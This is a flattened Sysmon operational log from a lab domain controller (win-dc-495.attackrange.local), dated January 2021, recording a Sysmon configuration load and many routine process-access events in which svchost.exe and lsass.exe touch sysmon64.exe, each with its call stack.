16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local2021-01-18 13:33:09.777c:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=053B78A3D994D6604525A750D088177DAE3B5F72779F202BD327F521DD97B212 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.168{59A5CD1D-8CA9-6005-1300-00000000A201}12682032C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.137{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 